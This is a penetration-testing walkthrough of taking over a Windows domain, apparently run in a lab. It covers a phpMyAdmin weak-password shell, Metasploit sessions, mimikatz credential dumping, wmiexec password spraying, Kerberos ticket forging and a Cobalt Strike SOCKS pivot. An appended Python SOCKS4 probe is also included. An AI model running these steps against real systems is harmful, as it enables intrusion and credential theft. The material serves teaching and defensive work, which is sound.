Preface
During a penetration test, once one host in the domain has been taken over, the other hosts on the intranet sometimes have Internet access and sometimes do not. If they do, the engagement can continue as a regular penetration test. If they do not, the compromised host has to serve as a springboard (pivot): a SOCKS proxy or a similar tunnel is used to reach the hosts that cannot connect out.
Hosts in the domain have Internet access
Attack process
Starting from the Internet-facing web service on the webserver host in the domain, work toward domain controller privileges.
Once control of the webserver has been obtained:
0x01:
- Get a shell through a phpMyAdmin weak password.
0x02:
- Generate a payload with msfvenom and start an msf listener; once the session is back, run getsystem. Upload mimikatz (upload /root/x64 c:\test) and dump credentials:
privilege::debug sekurlsa::logonpasswords
0x03:
- Batch-test weak passwords with wmiexec (impacket) against the .29, .31 and .32 hosts.
0x04:
- Gain access to .29, .31 and .32, bring the sessions back to msf and run getsystem.
0x05:
- Batch-test weak passwords with wmiexec again; .21 hits.
- In the session: execute -f cmd.exe -H -i
0x06:
- Export all hashes and use them for golden and silver tickets. A golden ticket needs the krbtgt account hash, which only comes from a domain controller; a silver ticket only needs the hash of the service (usually machine) account of the target host, so it can be forged from the hashes dumped on a member server.
Hosts in the domain have no Internet access
Msf
- I took the webserver and found that it sits on two network segments, 192.168.3.31 and 192.168.230.131. Assume 192.168.230.131 faces the external network and 192.168.3.31 is the internal one.
- It also turned out that no other host on the intranet can reach the Internet; only the webserver can.
- At this point the webserver is used as the springboard: open a SOCKS proxy with Cobalt Strike and drive msf through it.
Operating procedures
#cobalt strike
- Start the team server, create a listener, generate the payload, get the beacon online, escalate privileges.
- Start a socks4 proxy on the beacon. CS opens the listening port on the team server and relays every connection through the beacon, then prints the matching setg Proxies line. The address in that line is therefore the team server's, not the webserver's.
- Copy socks4:192.168.230.133:xxxxx into msf.
msfconsole
- Load the proxy: setg Proxies socks4:192.168.230.133:xxxxx
- Attack modules that work through the proxy: ms17-010, ms14-068, smb psexec, etc. Only TCP is carried by SOCKS4, so ICMP and UDP based discovery will not see the inner segment.
- use exploit/windows/smb/psexec (set rhosts to the target's inner-segment address)
#Use a bind payload so the host without Internet access never has to connect back
- set payload windows/meterpreter/bind_tcp (msf connects to the port the stager opens on the target, through the SOCKS proxy; a reverse_tcp payload would require the target to reach the attacker, which it cannot)
- set smbuser administrator
- set smbpass admin!@#45
- Upload mimikatz: upload /root/x64 c:\test
- In mimikatz: privilege::debug sekurlsa::logonpasswords
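What `setg Proxies socks4:...` actually does under the hood, written out as an added example (this is not code from the original post or from Cobalt Strike/Metasploit). Every TCP connection an msf module opens while that setting is active, whether the psexec SMB session to 445 or the connect to a bind_tcp stager, is wrapped in the SOCKS4 CONNECT handshake below, sent to the team server, which relays it through the beacon on the webserver. The script implements that client side and uses the same "does the inner port answer?" check as a probe through the pivot. The inner addresses are the post's (192.168.3.31); the in-process fake proxy, its port, and the choice of which targets it "grants" are assumptions so the script runs offline.

```python
"""SOCKS4 CONNECT through a pivot: the handshake msf performs for every
TCP connection when `setg Proxies socks4:<teamserver>:<port>` is set.

Added example, not code from the original post. The FakeSocks4Proxy class
stands in for the Cobalt Strike team server's socks4 listener (assumed
behaviour: it grants CONNECTs only to ports the 'beacon' can reach)."""
import socket
import struct
import threading

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_GRANTED = 0x5A    # request granted
SOCKS4_REJECTED = 0x5B   # request rejected or failed


def build_connect_request(dst_ip: str, dst_port: int, user_id: bytes = b"") -> bytes:
    """Encode a SOCKS4 CONNECT: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL."""
    header = struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CMD_CONNECT,
                         dst_port, socket.inet_aton(dst_ip))
    return header + user_id + b"\x00"


def parse_connect_request(data: bytes):
    """Decode the fixed 8-byte SOCKS4 request header -> (cmd, ip, port)."""
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != SOCKS4_VERSION:
        raise ValueError("not a SOCKS4 request")
    return cd, socket.inet_ntoa(ip), port


def socks4_connect(proxy_host: str, proxy_port: int, dst_ip: str,
                   dst_port: int, timeout: float = 5.0) -> bool:
    """Ask the proxy to open dst_ip:dst_port on our behalf.

    Returns True if the proxy granted the CONNECT (the inner port answered),
    False if it was rejected. The attacker only needs a route to the proxy,
    never to the inner host: this is the 'netless' probe. Only TCP can be
    carried this way; ICMP/UDP never traverse a SOCKS4 proxy."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_connect_request(dst_ip, dst_port))
        reply = s.recv(8)
        if len(reply) < 8 or reply[0] != 0x00:   # reply VN is always 0
            raise ValueError("malformed SOCKS4 reply")
        return reply[1] == SOCKS4_GRANTED


class FakeSocks4Proxy:
    """Constructed stand-in for the team server's socks4 listener.

    It 'grants' connections only to REACHABLE targets, mimicking a beacon that
    can reach SMB on the inner host but finds RDP closed."""
    REACHABLE = {("192.168.3.31", 445)}   # assumed inner host/port that answers

    def __init__(self):
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(("127.0.0.1", 0))      # ephemeral port, loopback only
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                cd, ip, port = parse_connect_request(conn.recv(512))
                ok = cd == SOCKS4_CMD_CONNECT and (ip, port) in self.REACHABLE
                code = SOCKS4_GRANTED if ok else SOCKS4_REJECTED
                # Reply layout: VN=0, CD=result, DSTPORT, DSTIP (the last two are ignored)
                conn.sendall(struct.pack("!BBH4s", 0x00, code, port, socket.inet_aton(ip)))


def probe_through_pivot(proxy_host: str, proxy_port: int, targets):
    """Check (ip, port) pairs through the pivot -> {target: reachable?}."""
    return {t: socks4_connect(proxy_host, proxy_port, *t) for t in targets}


if __name__ == "__main__":
    proxy = FakeSocks4Proxy()
    result = probe_through_pivot("127.0.0.1", proxy.port,
                                 [("192.168.3.31", 445), ("192.168.3.31", 3389)])
    for (ip, port), is_open in result.items():
        print(f"{ip}:{port} via socks4 -> {'open' if is_open else 'closed/rejected'}")
```

Against a real team server you would point `proxy_host`/`proxy_port` at the address CS prints in its `setg Proxies` line; the request bytes are identical. The same mechanism is why the post's `bind_tcp` choice works: msf initiates the connection to the stager's bind port through this CONNECT, whereas a reverse payload would require the inner host to open its own connection outward, which it cannot do.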